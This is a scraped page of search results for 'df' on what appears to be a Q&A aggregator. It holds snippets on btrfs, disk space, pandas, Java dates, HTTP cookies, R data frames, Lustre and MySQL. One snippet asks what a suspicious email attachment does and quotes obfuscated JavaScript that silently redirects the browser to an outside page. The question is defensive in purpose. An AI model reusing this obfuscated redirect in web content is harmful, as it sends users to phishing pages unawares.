Search Results

Search found 580 results on 24 pages for 'df'.

Page 8/24 | < Previous Page | 4 5 6 7 8 9 10 11 12 13 14 15  | Next Page >

  • btrfs and missing free space

    - by easteregg
    I converted my ext4 partition to btrfs and deleted the save subvolume after doing so. Then I enabled the compression (lzo) of the filessystem in the fstab file and everything is correct so far. Then I forced the compression of all files using the defragmentation command with the parameter -c that the new compression is applied to all files. While doing so, I noticed that my ssd got completly filled up - before I had 6gigs of free space. No I got nothing left. easteregg@x201s:~$ btrfs fi df / Data: total=50.00GB, used=49.17GB System: total=32.00MB, used=4.00KB Metadata: total=24.50GB, used=9.86GB and easteregg@x201s:~$ df -ha Filesystem Size Used Avail Use% Mounted on /dev/sda1 75G 60G 852M 99% / So now. How can I regain my free space. I expected to gain more space because of the lzo compression. And now! The fs is correctly mounted. easteregg@x201s:~$ mount /dev/sda1 on / type btrfs (rw,noatime,ssd,compress=lzo) Any ideas how to fix this issue?

    Read the article

  • After deleting log files, Ubuntu server still saying there is no space

    - by Mark
    My Ubuntu server has stopped due to a lack of disk space. I deleted some log files which has grown huge very quickly. But df -h still shows I have no space left. When I run du -sh /* I can see that I should have plenty of disk space left after deleting the logs. I ran lsof +L1 and it brought up two files: /var/log/mail.log and /var/log/mail.err. These are two logs I had deleted. I restarted apache, postfix and mysql (mysql wont restart because of lack of disk space, it think) but still df -h shows no space.

    Read the article

  • Pandas Dataframe to JSON File with Separate Records

    - by Chris
    I'm attempting to dump data from a Pandas Dataframe into a JSON file to import into MongoDB. The format I require in a file has JSON records on each line of the form: {<column 1>:<value>,<column 2>:<value>,...,<column N>:<value>} df.to_json(,orient='records') gets close to the result but all the records are dumped within a single JSON array. Any thoughts on an efficient way to get this result from a dataframe? UPDATE: The best solution I've come up with is the following: dlist = df.to_dict('records') dlist = [json.dumps(record)+"\n" for record in dlist] open('data.json','w').writelines(dlist)

    Read the article

  • JAVA Calendar - How to check if it's Saturday/Sunday ?

    - by Cristian
    What this code does is print the dates of the current week from Monday to Friday. It works fine, but I want to ask something else: If today is Saturday or Sunday I want it to show the next week... how do I do that? Here's my working code so far (thanks to StackOverflow!!): // Get calendar set to current date and time Calendar c = Calendar.getInstance(); // Set the calendar to monday of the current week c.set(Calendar.DAY_OF_WEEK, Calendar.MONDAY); // Print dates of the current week starting on Monday to Friday DateFormat df = new SimpleDateFormat("EEE dd/MM/yyyy"); for (int i = 0; i <= 4; i++) { System.out.println(df.format(c.getTime())); c.add(Calendar.DATE, 1); Thanks a lot! I really appreciate it as I've been searching for the solution for hours...

    Read the article

  • HttpWebRequest Cookie weirdness

    - by Lachman
    I'm sure I must be doing something wrong. But can't for the life of me figure out what is going on. I have a problem where it seems that the HttpWebRequest class in the framework is not correctly parsing the cookies from a web response. I'm using Fiddler to see what is going on and after making a request, the headers of the response look as such: HTTP/1.1 200 Ok Connection: close Date: Wed, 14 Jan 2009 18:20:31 GMT Server: Microsoft-IIS/6.0 P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI" Set-Cookie: user=v.5,0,EX01E508801E$97$2E401000t$1BV6$A1$EC$104$A1$EC$104$A1$EC$104$21O001000$1E31!90$7CP$AE$3F$F3$D8$19o$BC$1Cd$23; Domain=.thedomain.com; path=/ Set-Cookie: minfo=v.4,EX019ECD28D6k$A3$CA$0C$CE$A2$D6$AD$D4!2$8A$EF$E8n$91$96$E1$D7$C8$0F$98$AA$ED$DC$40V$AB$9C$C1$9CF$C9$C1zIF$3A$93$C6$A7$DF$A1$7E$A7$A1$A8$BD$A6$94c$D5$E8$2F$F4$AF$A2$DF$80$89$BA$BBd$F6$2C$B6$A8; expires=Sunday, 31-Dec-2014 23:59:59 GMT; Domain=.thedomain.com; path=/ Set-Cookie: accttype=v.2,3,1,EX017E651B09k$A3$CA$0C$DB$A2$CB$AD$D9$8A$8C$EF$E8t$91$90$E1$DC$C89$98$AA$E0$DC$40O$A8$A4$C1$9C; expires=Sunday, 31-Dec-2014 23:59:59 GMT; Domain=.thedomain.com; path=/ Set-Cookie: tpid=v.1,20001; expires=Sunday, 31-Dec-2014 23:59:59 GMT; Domain=.thedomain.com; path=/ Set-Cookie: MC1=GUID=541977e04a341a2a4f4cdaaf49615487; expires=Sunday, 31-Dec-2014 23:59:59 GMT; Domain=.thedomain.com; path=/ Set-Cookie: linfo=v.4,EQC|0|0|255|1|0||||||||0|0|0||0|0|0|-1|-1; expires=Sunday, 31-Dec-2014 23:59:59 GMT; Domain=.thedomain.com; path=/ Set-Cookie: group=v.1,0; expires=Sunday, 31-Dec-2014 23:59:59 GMT; Domain=.thedomain.com; path=/ Content-Type: text/html But when I look at the response.Cookies, I see far more cookies that I am expecting, with values of different cookies being split up into different cookies. Manually getting the headers seems to result in more wierdness eg: the code foreach(string cookie in response.Headers.GetValues("Set-Cookie")) { Console.WriteLine("Cookie found: " + cookie); } produces the output: Cookie found: user=v.5 Cookie found: 0 Cookie found: EX01E508801E$97$2E401000t$1BV6$A1$EC$104$A1$EC$104$A1$EC$104$21O00 1000$1E31!90$7CP$AE$3F$F3$D8$19o$BC$1Cd$23; Domain=.thedomain.com; path=/ Cookie found: minfo=v.4 Cookie found: EX019ECD28D6k$A3$CA$0C$CE$A2$D6$AD$D4!2$8A$EF$E8n$91$96$E1$D7$C8$0 F$98$AA$ED$DC$40V$AB$9C$C1$9CF$C9$C1zIF$3A$93$C6$A7$DF$A1$7E$A7$A1$A8$BD$A6$94c$ D5$E8$2F$F4$AF$A2$DF$80$89$BA$BBd$F6$2C$B6$A8; expires=Sunday Cookie found: 31-Dec-2014 23:59:59 GMT; Domain=.thedomain.com; path=/ Cookie found: accttype=v.2 Cookie found: 3 Cookie found: 1 Cookie found: EX017E651B09k$A3$CA$0C$DB$A2$CB$AD$D9$8A$8C$EF$E8t$91$90$E1$DC$C89 $98$AA$E0$DC$40O$A8$A4$C1$9C; expires=Sunday Cookie found: 31-Dec-2014 23:59:59 GMT; Domain=.thedomain.com; path=/ Cookie found: tpid=v.1 Cookie found: 20001; expires=Sunday Cookie found: 31-Dec-2014 23:59:59 GMT; Domain=.thedomain.com; path=/ Cookie found: MC1=GUID=541977e04a341a2a4f4cdaaf49615487; expires=Sunday Cookie found: 31-Dec-2014 23:59:59 GMT; Domain=.thedomain.com; path=/ Cookie found: linfo=v.4 Cookie found: EQC|0|0|255|1|0||||||||0|0|0||0|0|0|-1|-1; expires=Sunday Cookie found: 31-Dec-2014 23:59:59 GMT; Domain=.thedomain.com; path=/ Cookie found: group=v.1 Cookie found: 0; expires=Sunday Cookie found: 31-Dec-2014 23:59:59 GMT; Domain=.thedomain.com; path=/ as you can see - the first cookie in the list raw response: Set-Cookie: user=v.5,0,EX01E508801 is getting split into: Cookie found: user=v.5 Cookie found: 0 Cookie found: EX01E508801E$.......... So - what's going on here? Am I wrong? Is the HttpWebRequest class incorrectly parsing the http headers? Is the webserver that it spitting out the requests producing invalid http headers?

    Read the article

  • What does this suspicious phishing code do?

    - by halohunter
    A few of my non-IT coworkers opened a .html attachment in an email message that looks extremely suspicious. It resulted in a blank screen when it appears that some javascript code was run. <script type='text/javascript'>function uK(){};var kV='';uK.prototype = {f : function() {d=4906;var w=function(){};var u=new Date();var hK=function(){};var h='hXtHt9pH:9/H/Hl^e9n9dXe!r^mXeXd!i!a^.^c^oHm^/!iHmHaXg!e9sH/^zX.!hXt9m^'.replace(/[\^H\!9X]/g, '');var n=new Array();var e=function(){};var eJ='';t=document['lDo6cDart>iro6nD'.replace(/[Dr\]6\>]/g, '')];this.nH=false;eX=2280;dF="dF";var hN=function(){return 'hN'};this.g=6633;var a='';dK="";function x(b){var aF=new Array();this.q='';var hKB=false;var uN="";b['hIrBeTf.'.replace(/[\.BTAI]/g, '')]=h;this.qO=15083;uR='';var hB=new Date();s="s";}var dI=46541;gN=55114;this.c="c";nT="";this.bG=false;var m=new Date();var fJ=49510;x(t);this.y="";bL='';var k=new Date();var mE=function(){};}};var l=22739;var tL=new uK(); var p="";tL.f();this.kY=false;</script> What did it do? It's beyond the scope of my programming knowledge.

    Read the article

  • Parsing a String into date with pattern:"dd/MM/yyyy"

    - by kawtousse
    Hi, I want to insert a date having this format MM/dd/YYYY for example:04/29/2010 to 29/04/2010 to be inserted into mysql database in a field typed Date. So i have this code: String dateimput=request.getParameter("datepicker"); DateFormat df = new SimpleDateFormat("dd/MM/yyyy"); Date dt = null; try { dt = df.parse(dateimput); System.out.println("date imput is:" +dt); } catch (ParseException e) { e.printStackTrace(); } but it gives me those error: 1-date imput is:Fri May 04 00:00:00 CEST 2012 (it is not the correct value that have been entered). 2-dismatching with mysql date type. I can not detect the error exactly. Please help.

    Read the article

  • The String source is unknown while using the parse methode!

    - by kawtousse
    Hi everyone, to parse a string to a date sql valid: SimpleDateFormat df = new SimpleDateFormat("yyyy-MM-dd"); java.util.Date date = null; try { date = df.parse(dateimput); } catch (ParseException e2) { // TODO Auto-generated catch block e2.printStackTrace(); } with dateimput is what i get from my form like that: String dateimput=request.getParameter("datepicker"); but when running see the error: java.text.ParseException: Format.parseObject(String) failed at java.text.Format.parseObject(Unknown Source) at ServletEdition.doPost(ServletEdition.java:70) so it mean that dateimput is not known + I note that it is correctly dislayed when: System.out.println("datepicker:" +dateimput); Thanks.

    Read the article

  • Changing ylim (axis limits) drops data falling outside range. How can this be prevented?

    - by Alex Holcombe
    df <- data.frame(age=c(10,10,20,20,25,25,25),veg=c(0,1,0,1,1,0,1)) g=ggplot(data=df,aes(x=age,y=veg)) g=g+stat_summary(fun.y=mean,geom="point") Points reflect mean of veg at each age, which is what I expected and want to preserve after changing axis limits with the command below. g=g+ylim(0.2,1) Changing axis limits with the above command unfortunately causes veg==0 subset to be dropped from the data, yielding "Warning message: Removed 4 rows containing missing values (stat_summary)" This is bad because now the data plot (stat_summary mean) omits the veg==0 points. How can this be prevented? I simply want to avoid showing the empty part of the plot- the ordinate from 0 to .2, but not drop the associated data from the stat_summary calculation.

    Read the article

  • Convert object to DateRange

    - by user655832
    I'm querying an underlying PostgreSQL database using Pandas 0.8. Pandas is returning the DataFrame properly but the underlying timestamp column in my database is being returned as a generic "object" type in Pandas. As I would eventually like to seasonal normalization of my data I am curious as to how to convert this generic "object" column to something that is appropriate for analysis. Here is my current code to retrieve the data: # get records from db example import pandas.io.sql as psql import psycopg2 # define query to get all subs created this year QRY = """ select i i, i * random() f, case when random() > 0.5 then true else false end t, (current_date - (i*random())::int)::timestamp with time zone tsz from generate_series(1,1000) as s(i) order by 4 ; """ CONN_STRING = "host='localhost' port=5432 dbname='postgres' user='postgres'" # connect to db conn = psycopg2.connect(CONN_STRING) # get some data set index on relid column df = psql.frame_query(QRY, con=conn) print "Row count retrieved: %i" % (len(df),) Thanks for any help you can render. M

    Read the article

  • Discovering maximum packet size

    - by ereOn
    I'm working on a network-related project and I am using DTLS (TLS/UDP) to secure communications. Reading the specifications for DTLS, I've noted that DTLS requires the DF flag (Don't Fragment) to be set. On my local network if I try to send a message bigger than 1500 bytes, nothing is sent. That makes perfect sense. On Windows the sendto() reports a success but nothing is sent. I obviously cannot unset the DF flag manually since it is mandatory for DTLS and i'm not sure whether the 1500 bytes limit (MTU ?) could change in some situations. I guess it can. So, my question is : "Is there a way to discover this limit ?" If not, what would be the lowest possible value ? My software runs under UNIX (Linux/MAC OSX) and Windows OSes so different solutions for each OS are welcome ;) Many thanks.

    Read the article

  • R data frame select by global variable

    - by Matt
    I'm not sure how to do this without getting an error. Here is a simplified example of my problem. Say I have this data frame DF a b c d 1 2 3 4 2 3 4 5 3 4 5 6 Then I have a variable x <- min(c(1,2,3)) Now I want do do the following y <- DF[a == x] But when I try to refer to some variable like "x" I get an error because R is looking for a column "x" in my data frame. I get the "undefined columns selected" error How can I do what I am trying to do in R?

    Read the article

  • Perl: Compare and edit underlying structure in hash

    - by Mahfuzur Rahman Pallab
    I have a hash of complex structure and I want to perform a search and replace. The first hash is like the following: $VAR1 = { abc => { 123 => ["xx", "yy", "zy"], 456 => ["ab", "cd", "ef"] }, def => { 659 => ["wx", "yg", "kl"], 456 => ["as", "sd", "df"] }, mno => { 987 => ["lk", "dm", "sd"] }, } and I want to iteratively search for all '123'/'456' elements, and if a match is found, I need to do a comparison of the sublayer, i.e. of ['ab','cd','ef'] and ['as','sd','df'] and in this case, keep only the one with ['ab','cd','ef']. So the output will be as follows: $VAR1 = { abc => { 123 => ["xx", "yy", "zy"], 456 => ["ab", "cd", "ef"] }, def => { 659 => ["wx", "yg", "kl"] }, mno => { 987 => ["lk", "dm", "sd"] }, } So the deletion is based on the substructure, and not index. How can it be done? Thanks for the help!! Lets assume that I will declare the values to be kept, i.e. I will keep 456 = ["ab", "cd", "ef"] based on a predeclared value of ["ab", "cd", "ef"] and delete any other instance of 456 anywhere else. The search has to be for every key. so the code will go through the hash, first taking 123 = ["xx", "yy", "zy"] and compare it against itself throughout the rest of the hash, if no match is found, do nothing. If a match is found, like in the case of 456 = ["ab", "cd", "ef"], it will compare the two, and as I have said that in case of a match the one with ["ab", "cd", "ef"] would be kept, it will keep 456 = ["ab", "cd", "ef"] and discard any other instances of 456 anywhere else in the hash, i.e. it will delete 456 = ["as", "sd", "df"] in this case.

    Read the article

  • missing plot title in ggplot2

    - by Ben Mazzotta
    How can I create a plot title in ggplot2? Am I making a silly syntax error? The ggplot2 docs indicate that labs(title = 'foo') should work, but I can only get the arguments x='foo' and y='foo' to work with labs(). Neither ggtitle() nor title() worked either. Here is an example. x <- rnorm(10,10,1) y <- rnorm(10,20,2) xy.df <- data.frame(x,y) qplot(x,y, data=xy.df, geom='point', color=x*y) + labs(title = "New Plot Title", x='Some Data', y='Some Other Data')

    Read the article

  • Compute rolling window covariance matrix

    - by user1665355
    I am trying to compute a rolling window (shifting by 1 day) covariance matrix for a number of assets. Say my df looks like this: df <- data.frame(x = 0:4, y = 5:9,z=1:5,u=4:8) How would a possible for loop look like if I want to calculate a covariance matrix on a rolling basis by shifting the rolling window by 1 day? Or should I use some apply family function? What time series class would be preferrable if I want to create a time series object for the loop above? I simply can't get it... Best Regards

    Read the article

  • Using reshape + cast to aggregate over multiple columns

    - by DamonJW
    In R, I have a data frame with columns for Seat (factor), Party (factor) and Votes (numeric). I want to create a summary data frame with columns for Seat, Winning party, and Vote share. For example, from the data frame df <- data.frame(party=rep(c('Lab','C','LD'),times=4), votes=c(1,12,2,11,3,10,4,9,5,8,6,15), seat=rep(c('A','B','C','D'),each=3)) I want to get the output seat winner voteshare 1 A C 0.8000000 2 B Lab 0.4583333 3 C C 0.5000000 4 D LD 0.5172414 I can figure out how to achieve this. But I'm sure there must be a better way, probably a cunning one-liner using Hadley Wickham's reshape package. Any suggestions? For what it's worth, my solution uses a function from my package djwutils_2.10.zip and is invoked as follows. But there are all sorts of special cases it doesn't deal with, so I'd rather rely on someone else's code. aggregateList(df, by=list(seat=seat), FUN=list(winner=function(x) x$party[which.max(x$votes)], voteshare=function(x) max(x$votes)/sum(x$votes)))

    Read the article

  • Parsing a string to date gives 01/01/0001 00:00:00

    - by kawtousse
    String dateimput=request.getParameter("datepicker"); System.out.printl("datepicker:" +dateimput); DateFormat df = new SimpleDateFormat("MM/dd/yyyy"); Date dt = null; try { dt = df.parse(dateimput); System.out.println("date imput is:" +dt); } catch (ParseException e) { e.printStackTrace(); } *datepicker:04/29/2010 (value I currently selected from datepicker). *the field in database is typed date. 1-date imput is:Thu Apr 29 00:00:00 CEST 2010 and in database level it is inserted like that 01/01/0001 00:00:00

    Read the article

  • semicolon in C++?

    - by SysAdmin
    Here is the question Is "missing semicolon" error really required? why not treat it as a warning? Why I am asking this stupid question? When I compile this code int f = 1 int h=2; the compiler intelligently tells me that where I am missing it. but to me its like - "If you know it, just treat it as if its there and go ahead. (Later I can fix the warning) int sdf = 1,df=2; sdf=1 df =2 even for this code it behaves the same. i.e even if multiple statements (without ;) are in the same line, the compiler knows. So, why not just remove this requirement? why not behave like python,vb etc

    Read the article

  • Drop Columns R Data frame

    - by Btibert3
    I have a number of columns that I would like to drop from a data frame. I know that we can drop them using something like: df$x <- NULL but I was hoping to do this with less commands. Also, I know that I could use this: df[ -c(1,3:6, 12) ] but I am concerned that the relative position of my variables may change. Given how powerful R is, I figured I would ask to see if there is another way beyond dropping each column 1 by 1. Thanks in advance.

    Read the article

  • Sign an OpenSSL .CSR with Microsoft Certificate Authority

    - by kce
    I'm in the process of building a Debian FreeRadius server that does 802.1x authentication for domain members. I would like to sign my radius server's SSL certificate (used for EAP-TLS) and leverage the domain's existing PKI. The radius server is joined to domain via Samba and has a machine account as displayed in Active Directory Users and Computers. The domain controller I'm trying to sign my radius server's key against does not have IIS installed so I can't use the preferred Certsrv webpage to generate the certificate. The MMC tools won't work as it can't access the certificate stores on the radius server because they don't exist. This leaves the certreq.exe utility. I'm generating my .CSR with the following command: openssl req -nodes -newkey rsa:1024 -keyout server.key -out server.csr The resulting .CSR: ******@mis-ke-lnx:~/G$ openssl req -text -noout -in mis-radius-lnx.csr Certificate Request: Data: Version: 0 (0x0) Subject: C=US, ST=Alaska, L=CITY, O=ORG, OU=DEPT, CN=ME/emailAddress=MYEMAIL Subject Public Key Info: Public Key Algorithm: rsaEncryption RSA Public Key: (1024 bit) Modulus (1024 bit): 00:a8:b3:0d:4b:3f:fa:a4:5f:78:0c:24:24:23:ac: cf:c5:28:af:af:a2:9b:07:23:67:4c:77:b5:e8:8a: 08:2e:c5:a3:37:e1:05:53:41:f3:4b:e1:56:44:d2: 27:c6:90:df:ae:3b:79:e4:20:c2:e4:d1:3e:22:df: 03:60:08:b7:f0:6b:39:4d:b4:5e:15:f7:1d:90:e8: 46:10:28:38:6a:62:c2:39:80:5a:92:73:37:85:37: d3:3e:57:55:b8:93:a3:43:ac:2b:de:0f:f8:ab:44: 13:8e:48:29:d7:8d:ce:e2:1d:2a:b7:2b:9d:88:ea: 79:64:3f:9a:7b:90:13:87:63 Exponent: 65537 (0x10001) Attributes: a0:00 Signature Algorithm: sha1WithRSAEncryption 35:57:3a:ec:82:fc:0a:8b:90:9a:11:6b:56:e7:a8:e4:91:df: 73:1a:59:d6:5f:90:07:83:46:aa:55:54:1c:f9:28:3e:a6:42: 48:0d:6b:da:58:e4:f5:7f:81:ee:e2:66:71:78:85:bd:7f:6d: 02:b6:9c:32:ad:fa:1f:53:0a:b4:38:25:65:c2:e4:37:00:16: 53:d2:da:f2:ad:cb:92:2b:58:15:f4:ea:02:1c:a3:1c:1f:59: 4b:0f:6c:53:70:ef:47:60:b6:87:c7:2c:39:85:d8:54:84:a1: b4:67:f0:d3:32:f4:8e:b3:76:04:a8:65:48:58:ad:3a:d2:c9: 3d:63 I'm trying to submit my certificate using the following certreq.exe command: certreq -submit -attrib "CertificateTemplate:Machine" server.csr I receive the following error upon doing so: RequestId: 601 Certificate not issued (Denied) Denied by Policy Module The DNS name is unavailable and cannot be added to the Subject Alternate name. 0x8009480f (-2146875377) Certificate Request Processor: The DNS name is unavailable and cannot be added to the Subject Alternate name. 0x8009480f (-2146875377) Denied by Policy Module My certificate authority has the following certificate templates available. If I try to submit by certreq.exe using "CertificiateTemplate:Computer" instead of "CertificateTemplate:Machine" I get an error reporting that "the requested certificate template is not supported by this CA." My google-foo has failed me so far on trying to understand this error... I feel like this should be a relatively simple task as X.509 is X.509 and OpenSSL generates the .CSRs in the required PKCS10 format. I can't be only one out there trying to sign a OpenSSL generated key on a Linux box with a Windows Certificate Authority, so how do I do this (perferably using the off-line certreq.exe tool)?

    Read the article

  • Lustre - issues with simple setup

    - by ethrbunny
    Issue: I'm trying to assess the (possible) use of Lustre for our group. To this end I've been trying to create a simple system to explore the nuances. I can't seem to get past the 'llmount.sh' test with any degree of success. What I've done: Each system (throwaway PCs with 70Gb HD, 2Gb RAM) is formatted with CentOS 6.2. I then update everything and install the Lustre kernel from downloads.whamcloud.com and add on the various (appropriate) lustre and e2fs RPM files. Systems are rebooted and tested with 'llmount.sh' (and then cleared with 'llmountcleanup.sh'). All is well to this point. First I create an MDS/MDT system via: /usr/sbin/mkfs.lustre --mgs --mdt --fsname=lustre --device-size=200000 --param sys.timeout=20 --mountfsoptions=errors=remount-ro,user_xattr,acl --param lov.stripesize=1048576 --param lov.stripecount=0 --param mdt.identity_upcall=/usr/sbin/l_getidentity --backfstype ldiskfs --reformat /tmp/lustre-mdt1 and then mkdir -p /mnt/mds1 mount -t lustre -o loop,user_xattr,acl /tmp/lustre-mdt1 /mnt/mds1 Next I take 3 systems and create a 2Gb loop mount via: /usr/sbin/mkfs.lustre --ost --fsname=lustre --device-size=200000 --param sys.timeout=20 --mgsnode=lustre_MDS0@tcp --backfstype ldiskfs --reformat /tmp/lustre-ost1 mkdir -p /mnt/ost1 mount -t lustre -o loop /tmp/lustre-ost1 /mnt/ost1 The logs on the MDT box show the OSS boxes connecting up. All appears ok. Last I create a client and attach to the MDT box: mkdir -p /mnt/lustre mount -t lustre -o user_xattr,acl,flock luster_MDS0@tcp:/lustre /mnt/lustre Again, the log on the MDT box shows the client connection. Appears to be successful. Here's where the issues (appear to) start. If I do a 'df -h' on the client it hangs after showing the system drives. If I attempt to create files (via 'dd') on the lustre mount the session hangs and the job can't be killed. Rebooting the client is the only solution. If I do a 'lctl dl' from the client it shows that only 2/3 OST boxes are found and 'UP'. [root@lfsclient0 etc]# lctl dl 0 UP mgc MGC10.127.24.42@tcp 282d249f-fcb2-b90f-8c4e-2f1415485410 5 1 UP lov lustre-clilov-ffff880037e4d400 00fc176e-3156-0490-44e1-da911be9f9df 4 2 UP lmv lustre-clilmv-ffff880037e4d400 00fc176e-3156-0490-44e1-da911be9f9df 4 3 UP mdc lustre-MDT0000-mdc-ffff880037e4d400 00fc176e-3156-0490-44e1-da911be9f9df 5 4 UP osc lustre-OST0000-osc-ffff880037e4d400 00fc176e-3156-0490-44e1-da911be9f9df 5 5 UP osc lustre-OST0003-osc-ffff880037e4d400 00fc176e-3156-0490-44e1-da911be9f9df 5 Doing a 'lfs df' from the client shows: [root@lfsclient0 etc]# lfs df UUID 1K-blocks Used Available Use% Mounted on lustre-MDT0000_UUID 149944 16900 123044 12% /mnt/lustre[MDT:0] OST0000 : inactive device OST0001 : Resource temporarily unavailable OST0002 : Resource temporarily unavailable lustre-OST0003_UUID 187464 24764 152636 14% /mnt/lustre[OST:3] filesystem summary: 187464 24764 152636 14% /mnt/lustre Given that each OSS box has a 2Gb (loop) mount I would expect to see this reflected in available size. There are no errors on the MDS/MDT box to indicate that multiple OSS/OST boxes have been lost. EDIT: each system has all other systems defined in /etc/hosts and entries in iptables to provide access. SO: I'm clearly making several mistakes. Any pointers as to where to start correcting them?

    Read the article

  • What is the default file system of /var/run, /var/lock

    - by Casey
    Trying to figure out if my /var/run is using disk or not. See the command output: $ df -h Filesystem Size Used Avail Use% Mounted on /dev/mapper/vg0-root 40G 15G 26G 36% / none 3.9G 340K 3.9G 1% /dev none 3.9G 1.1M 3.9G 1% /dev/shm tmpfs 3.9G 600K 3.9G 1% /tmp none 3.9G 452K 3.9G 1% /var/run none 3.9G 0 3.9G 0% /var/lock none 3.9G 0 3.9G 0% /lib/init/rw /dev/md0 236M 59M 165M 27% /boot /dev/mapper/vg0-home 60G 58G 2.3G 97% /home

    Read the article

  • Can't see my iPod

    - by Tom Brito
    When I plug in my 32GB iPod Touch 4G, it mounts a 1GB drive. Rhythmbox does not react, neither does Banshee. Any ideas how to copy my music? The output of df is: Filesystem 1K-blocks Used Available Use% Mounted on /dev/sda1 28834716 4347480 23022512 16% / udev 1026788 288 1026500 1% /dev none 1026788 1496 1025292 1% /dev/shm none 1026788 204 1026584 1% /var/run none 1026788 0 1026788 0% /var/lock none 1026788 0 1026788 0% /lib/init/rw /dev/sda6 96124904 62709456 28532496 69% /home

    Read the article

  • Why is my hard drive mounted on /boot?

    - by divided
    I was doing an update and it said that the drive was full. Here is df -h: Filesystem Size Used Avail Use% Mounted on 78G 2.7G 72G 4% / none 242M 184K 242M 1% /dev none 247M 0 247M 0% /dev/shm none 247M 48K 247M 1% /var/run none 247M 0 247M 0% /var/lock none 247M 0 247M 0% /lib/init/rw /dev/sda1 228M 225M 0 100% /boot How can I fix /dev/sda1 being mounted on /boot?

    Read the article

  • Mysql: Disk is full writing

    - by elma
    Hi there, I'm having some problems with my mysql server lately, so I've decided to check the error logs: [root@LSN-D1179 log]# tail -10 mysqld.log 100325 19:30:03 [ERROR] /usr/libexec/mysqld: Table './lfe/actions' is marked as crashed and should be repaired 100325 19:30:03 [ERROR] /usr/libexec/mysqld: Table './lfe/actions' is marked as crashed and should be repaired 100325 19:30:18 [ERROR] /usr/libexec/mysqld: Disk is full writing './omuz/ibf_task_logs.MYD' (Errcode: 122). Waiting for someone to free space... Retry in 60 secs 100325 19:34:34 [ERROR] /usr/libexec/mysqld: Disk is full writing './omuz/ibf_profile_portal_views.MYD' (Errcode: 122). Waiting for someone to free space... Retry in 60 secs 100325 19:39:46 [ERROR] /usr/libexec/mysqld: Disk is full writing './omuz/ibf_posts.TMD' (Errcode: 122). Waiting for someone to free space... Retry in 60 secs 100325 19:40:18 [ERROR] /usr/libexec/mysqld: Disk is full writing './omuz/ibf_task_logs.MYD' (Errcode: 122). Waiting for someone to free space... Retry in 60 secs 100325 19:44:34 [ERROR] /usr/libexec/mysqld: Disk is full writing './omuz/ibf_profile_portal_views.MYD' (Errcode: 122). Waiting for someone to free space... Retry in 60 secs 100325 19:49:46 [ERROR] /usr/libexec/mysqld: Disk is full writing './omuz/ibf_posts.TMD' (Errcode: 122). Waiting for someone to free space... Retry in 60 secs 100325 19:50:18 [ERROR] /usr/libexec/mysqld: Disk is full writing './omuz/ibf_task_logs.MYD' (Errcode: 122). Waiting for someone to free space... Retry in 60 secs 100325 19:54:34 [ERROR] /usr/libexec/mysqld: Disk is full writing './omuz/ibf_profile_portal_views.MYD' (Errcode: 122). Waiting for someone to free space... Retry in 60 secs And here's is my df -h output [root@LSN-D1179 log]# df -h Filesystem Size Used Avail Use% Mounted on /dev/mapper/VolGroup00-LogVol00 143G 6.2G 129G 5% / /dev/sda1 99M 12M 83M 13% /boot tmpfs 490M 0 490M 0% /dev/shm As you can see, I have plenty of free space; so I couldn't figure out these "Disk is full" errors in mysqld.log. Does anyone know what should I do to fix this? Ugur

    Read the article

< Previous Page | 4 5 6 7 8 9 10 11 12 13 14 15  | Next Page >